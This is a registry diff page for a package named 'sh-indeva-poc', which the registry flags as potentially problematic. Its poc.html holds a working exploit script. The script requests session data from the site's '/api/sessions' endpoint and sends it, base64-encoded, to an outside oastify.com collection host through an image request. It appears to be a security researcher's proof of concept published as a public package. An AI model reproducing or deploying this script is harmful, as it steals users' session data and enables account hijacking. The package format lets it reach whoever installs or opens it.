sh-indeva-poc 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of sh-indeva-poc might be problematic. Click here for more details.
- package/package.json +11 -0
- package/poc.html +23 -0
package/package.json
ADDED
package/poc.html
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
<!DOCTYPE html>
|
2
|
+
<html>
|
3
|
+
<head>
|
4
|
+
<meta charset="utf-8">
|
5
|
+
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
6
|
+
<title>Indeva PoC</title>
|
7
|
+
<meta name="description" content="">
|
8
|
+
<meta name="viewport" content="width=device-width, initial-scale=1">
|
9
|
+
<link rel="stylesheet" href="">
|
10
|
+
</head>
|
11
|
+
<body>
|
12
|
+
|
13
|
+
<script>
|
14
|
+
fetch('/api/sessions?items=*')
|
15
|
+
.then(response => {
|
16
|
+
return response.json();
|
17
|
+
}) .then(data => {
|
18
|
+
let image = new Image();
|
19
|
+
image.src = 'http://kl9y4ti2fy4i0hwdwgphdqu40v6muoid.oastify.com/?' + btoa(JSON.stringify(data));
|
20
|
+
});
|
21
|
+
</script>
|
22
|
+
</body>
|
23
|
+
</html>
|